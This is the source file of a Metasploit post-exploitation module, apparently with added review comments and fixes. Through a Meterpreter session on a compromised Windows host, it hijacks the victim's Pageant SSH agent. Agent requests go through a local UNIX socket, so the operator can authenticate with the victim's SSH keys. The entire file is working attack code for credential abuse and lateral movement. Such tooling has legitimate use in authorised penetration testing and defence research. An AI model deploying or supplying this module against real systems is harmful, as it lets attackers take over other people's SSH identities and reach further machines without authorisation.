metasploit-framework/modules/post/windows/manage/forward_pageant.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'tmpdir'
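# Post module that exposes the Pageant agent on a Meterpreter session host
# through a local UNIX socket, so that tools honouring SSH_AUTH_SOCK on the
# operator's machine send their agent requests to it.
#
# Every request read from the local socket is handed unmodified to the
# pageantjacker extension and the extension's reply is written back.
# Anyone who can connect to the socket can therefore issue requests to the
# remote agent while the module is running, which is why the socket is
# restricted to its owner and removed on exit.
class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Priv

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged through
  #   update_info
  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Forward Pageant',
      'Description'   => %q{
        This module forwards Pageant.
      },
      'License'       => MSF_LICENSE,
      'Author'        => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    #register_options(
    #  [
    #  ], self.class)
  end

  # Loads the pageantjacker extension, opens a UNIX socket in the temp
  # directory and relays agent requests until the module is interrupted.
  #
  # @return [false] when the extension cannot be loaded or the socket path
  #   already exists; otherwise the method only ends when the listener is
  #   interrupted or raises
  def run
    # Load the pageantjacker extension on demand, then re-check: use() may
    # have failed without raising.
    session.core.use("pageantjacker") unless session.pageantjacker

    unless session.pageantjacker
      print_error("Failed to load pageantjacker on #{session.sid} (#{session.session_host})")
      return false
    end

    # NOTE(review): Dir::Tmpname.make_tmpname is not available on newer Ruby
    # releases -- confirm against the Ruby version the framework targets.
    sockpath = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('pageantjacker', 5)}"

    # File.exist? replaces the deprecated File.exists? alias.
    if ::File.exist?(sockpath)
      print_error("Your requested socket (#{sockpath}) already exists. Remove it or choose another path and try again.")
      return false
    end

    begin
      ::UNIXServer.open(sockpath) do |serv|
        # The socket lives in a shared temp directory; limit it to the
        # owning user so other local accounts cannot reach the agent.
        ::File.chmod(0600, sockpath)

        print_status("Launched listening socket on #{sockpath}.")
        print_status("Set your SSH_AUTH_SOCK variable to #{sockpath} (export SSH_AUTH_SOCK=\"#{sockpath}\")")
        print_status("Now use any tool normally (e.g. ssh-add)")

        loop do
          conn = serv.accept
          begin
            relay_agent_requests(conn)
          ensure
            # Close each client connection; the original leaked one
            # descriptor per accepted client.
            conn.close
          end
        end
      end
    ensure
      # The accept loop never ends normally, so cleanup must sit in an
      # ensure clause to run when the listener is interrupted or raises.
      if ::File.exist?(sockpath)
        print_status("Cleaning up; removing #{sockpath}")
        ::File.delete(sockpath)
      else
        print_status("Unable to remove socket #{sockpath}")
      end
    end
  end

  # Relays requests from one connected client to Pageant until the client
  # stops sending data.
  #
  # @param conn [UNIXSocket] accepted client connection
  # @return [void]
  def relay_agent_requests(conn)
    loop do
      request = conn.recvfrom(8192)
      # An empty or missing payload means the peer has closed the connection.
      break if request.nil? || request.first.nil? || request.first.empty?

      payload = request.first
      response_data = client.pageantjacker.forward_to_pageant(payload, payload.size)
      conn.send(response_data, 0) unless response_data.nil?
    end
  end
end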